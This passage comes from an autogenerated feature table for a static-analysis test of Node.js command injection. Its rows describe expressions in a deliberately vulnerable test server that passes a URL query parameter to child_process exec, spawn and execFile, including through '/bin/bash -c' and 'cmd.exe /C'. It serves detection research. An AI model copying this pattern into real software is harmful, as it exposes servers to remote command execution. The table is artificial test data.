args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:5:62:6 | cp | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:5:62:6 | cp | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:5:62:15 | cp.execFile | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:5:62:15 | cp.execFile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:5:62:15 | cp.execFile | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:5:62:15 | cp.execFile | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:5:62:15 | cp.execFile | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:5:62:39 | cp.exec ... , args) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:5:62:39 | cp.exec ... , args) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:5:62:39 | cp.exec ... , args) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:5:62:39 | cp.exec ... , args) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:5:62:39 | cp.exec ... , args) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:5:62:39 | exceptional return of cp.exec ... , args) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:5:62:39 | exceptional return of cp.exec ... , args) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:5:62:39 | exceptional return of cp.exec ... , args) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:5:62:39 | exceptional return of cp.exec ... , args) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:5:62:39 | exceptional return of cp.exec ... , args) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:8:62:15 | execFile | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:8:62:15 | execFile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:8:62:15 | execFile | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:8:62:15 | execFile | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:8:62:15 | execFile | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:17:62:22 | `/bin` | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:17:62:22 | `/bin` | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:17:62:22 | `/bin` | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:17:62:22 | `/bin` | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:17:62:22 | `/bin` | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:17:62:32 | `/bin` + "/bash" | CalleeFlexibleAccessPath | cp.execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:17:62:32 | `/bin` + "/bash" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:17:62:32 | `/bin` + "/bash" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:17:62:32 | `/bin` + "/bash" | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:17:62:32 | `/bin` + "/bash" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:17:62:32 | `/bin` + "/bash" | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:17:62:32 | `/bin` + "/bash" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:17:62:32 | `/bin` + "/bash" | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:17:62:32 | `/bin` + "/bash" | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:18:62:21 | /bin | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:18:62:21 | /bin | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:18:62:21 | /bin | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:18:62:21 | /bin | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:18:62:21 | /bin | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:18:62:21 | /bin | stringConcatenatedWith | -endpoint- '/bash' | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:26:62:32 | "/bash" | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:26:62:32 | "/bash" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:26:62:32 | "/bash" | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:26:62:32 | "/bash" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:26:62:32 | "/bash" | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:26:62:32 | "/bash" | stringConcatenatedWith | '/bin' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:35:62:38 | args | CalleeFlexibleAccessPath | cp.execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:35:62:38 | args | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:35:62:38 | args | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:35:62:38 | args | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:35:62:38 | args | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:35:62:38 | args | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:35:62:38 | args | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:35:62:38 | args | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:35:62:38 | args | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:1:66:0 | cp | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:1:66:0 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:1:66:0 | cp | enclosingFunctionBody | cmd args cp spawn cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:1:66:0 | cp | enclosingFunctionName | run | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:1:66:0 | cp | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:1:66:0 | this | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:1:66:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:1:66:0 | this | enclosingFunctionBody | cmd args cp spawn cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:1:66:0 | this | enclosingFunctionName | run | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:1:66:0 | this | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:1:68:1 | 'arguments' object of function run | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:1:68:1 | 'arguments' object of function run | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:1:68:1 | 'arguments' object of function run | enclosingFunctionBody | cmd args cp spawn cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:1:68:1 | 'arguments' object of function run | enclosingFunctionName | run | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:1:68:1 | 'arguments' object of function run | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:1:68:1 | exceptional return of function run | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:1:68:1 | exceptional return of function run | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:1:68:1 | exceptional return of function run | enclosingFunctionBody | cmd args cp spawn cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:1:68:1 | exceptional return of function run | enclosingFunctionName | run | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:1:68:1 | exceptional return of function run | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:1:68:1 | functio ... uild.\\n} | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:1:68:1 | functio ... uild.\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:1:68:1 | functio ... uild.\\n} | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:1:68:1 | return of function run | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:1:68:1 | return of function run | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:1:68:1 | return of function run | enclosingFunctionBody | cmd args cp spawn cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:1:68:1 | return of function run | enclosingFunctionName | run | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:1:68:1 | return of function run | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:10:66:12 | run | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:10:66:12 | run | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:10:66:12 | run | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:10:66:12 | run | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:10:66:12 | run | contextSurroundingFunctionParameters | (cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:10:66:12 | run | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:10:66:12 | run | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:14:66:16 | cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:14:66:16 | cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:14:66:16 | cmd | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:14:66:16 | cmd | contextSurroundingFunctionParameters | (cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:14:66:16 | cmd | enclosingFunctionBody | cmd args cp spawn cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:14:66:16 | cmd | enclosingFunctionBody | cmd args cp spawn cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:14:66:16 | cmd | enclosingFunctionName | run | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:14:66:16 | cmd | enclosingFunctionName | run | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:14:66:16 | cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:14:66:16 | cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:19:66:22 | args | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:19:66:22 | args | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:19:66:22 | args | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:19:66:22 | args | contextSurroundingFunctionParameters | (cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:19:66:22 | args | enclosingFunctionBody | cmd args cp spawn cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:19:66:22 | args | enclosingFunctionBody | cmd args cp spawn cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:19:66:22 | args | enclosingFunctionName | run | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:19:66:22 | args | enclosingFunctionName | run | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:19:66:22 | args | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:66:19:66:22 | args | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:3:67:4 | cp | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:3:67:4 | cp | contextSurroundingFunctionParameters | (cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:3:67:4 | cp | enclosingFunctionBody | cmd args cp spawn cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:3:67:4 | cp | enclosingFunctionName | run | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:3:67:4 | cp | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:3:67:10 | cp.spawn | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:3:67:10 | cp.spawn | contextSurroundingFunctionParameters | (cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:3:67:10 | cp.spawn | enclosingFunctionBody | cmd args cp spawn cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:3:67:10 | cp.spawn | enclosingFunctionName | run | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:3:67:10 | cp.spawn | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:3:67:21 | cp.spawn(cmd, args) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:3:67:21 | cp.spawn(cmd, args) | contextSurroundingFunctionParameters | (cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:3:67:21 | cp.spawn(cmd, args) | enclosingFunctionBody | cmd args cp spawn cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:3:67:21 | cp.spawn(cmd, args) | enclosingFunctionName | run | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:3:67:21 | cp.spawn(cmd, args) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:3:67:21 | exceptional return of cp.spawn(cmd, args) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:3:67:21 | exceptional return of cp.spawn(cmd, args) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:3:67:21 | exceptional return of cp.spawn(cmd, args) | enclosingFunctionBody | cmd args cp spawn cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:3:67:21 | exceptional return of cp.spawn(cmd, args) | enclosingFunctionName | run | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:3:67:21 | exceptional return of cp.spawn(cmd, args) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:6:67:10 | spawn | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:6:67:10 | spawn | contextSurroundingFunctionParameters | (cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:6:67:10 | spawn | enclosingFunctionBody | cmd args cp spawn cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:6:67:10 | spawn | enclosingFunctionName | run | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:6:67:10 | spawn | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:12:67:14 | cmd | CalleeFlexibleAccessPath | cp.spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:12:67:14 | cmd | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:12:67:14 | cmd | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:12:67:14 | cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:12:67:14 | cmd | contextSurroundingFunctionParameters | (cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:12:67:14 | cmd | enclosingFunctionBody | cmd args cp spawn cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:67:12:67:14 | cmd | enclosingFunctionName | run | +| 